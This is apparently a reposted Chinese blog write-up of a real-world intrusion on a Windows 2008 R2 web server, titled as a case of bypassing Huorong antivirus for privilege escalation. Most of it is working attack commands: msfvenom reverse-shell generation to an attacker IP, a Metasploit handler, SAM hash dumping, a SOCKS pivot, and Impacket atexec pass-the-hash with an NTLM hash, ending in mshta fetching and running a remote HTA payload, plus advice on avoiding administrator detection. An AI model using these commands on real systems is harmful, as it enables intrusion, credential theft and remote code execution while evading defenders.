|
0x01 前言
0x02 服务器基本信息搜集
目标系统:Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
当前权限:iis apppool*****.com
支持脚本:ASP、ASPX、PHP,能够直接执行系统命令
开放端口:21(ftp)、80(http)、135(rpc)、443(https)、445(smb)、801(http)、3306(mysql)、2121(G6FTP)、8021(G6FTP)、6588(hws)、58895(TermService)
进程名称:G6FTPServer.exe、G6FTPTray.exe、HwsHostPanel.exe、mysqld.exe、php-cgi.exe、SafeDogUpdateCenter.exe、CloudHelper.exe、SafeDogGuardCenter.exe、SafeDogTray.exe、SafeDogGuardHelper.exe、SafeDogGuardHelper.exe、HipsTray.exe、HipsDaemon.exe、usysdiag.exe
服务器上运行的有:火绒、护卫神主机大师、服务器安全狗、MySQL数据库和G6FTP,可以尝试提权方式有:护卫神主机大师、MySQL和G6FTP,不过在提权过程中得注意下火绒和服务器安全狗的查杀和拦截,尽可能的避免被管理员发现。
0x03 绕过火绒获取MSF会话
[root@p1600778655 ~]# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=155.**.***.16 lport=443 -f raw > /tmp/shellcode.bin
[root@p1600778655 ~]# cat /tmp/shellcode.bin | base64 -w 0
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 155.**.***.16
msf6 exploit(multi/handler) > set lport 443
msf6 exploit(multi/handler) > exploit
python -m SimpleHTTPServer 8888
python3 -m http.server 8888
0x04 SAM注册表项导出哈希
meterpreter > getuid
meterpreter > load powershell
meterpreter > powershell_shell
PS > Get-Acl -Path HKLM:SAMSAM | Format-List
meterpreter > run post/windows/gather/hashdump
0x05 atexec提升System权限
WMIcmd/sharpwmi/WMIHACKER/Sharp-WMIExec;
Impacket:
psexec(445)/wmiexec(135)/smbexec(445)/atexec(445);
利用方式:
Local本地执行 、Socks4/5代理 、Metasploit虚拟路由表;
meterpreter > run get_local_subnets
meterpreter > run autoroute -s 59.***.***.0/255.255.255.0
meterpreter > bg
msf6 auxiliary(server/socks_proxy) > set username test
msf6 auxiliary(server/socks_proxy) > set password 123456
msf6 auxiliary(server/socks_proxy) > run
[ ]
[root@p1600778655 ~]# proxychains4 -f /srv/proxychains/src/proxychains.conf python3 /srv/impacket/examples/atexec.py -hashes :ebdccc154cadcda7f5ef0a2149274f3c administrator@59.***.***.230 "cmd /c ping 9o**mf.dnslog.cn"
[root@p1600778655 ~]# proxychains4 -f /srv/proxychains/src/proxychains.conf python3 /srv/impacket/examples/atexec.py -hashes :ebdccc154cadcda7f5ef0a2149274f3c administrator@59.***.***.230 "cmd /c mshta http://155.**.***.16:8888/exp.hta"
推 荐 阅 读
欢 迎 私 下 骚 扰
原文始发于微信公众号(潇湘信安):记一次绕过火绒安全提权实战案例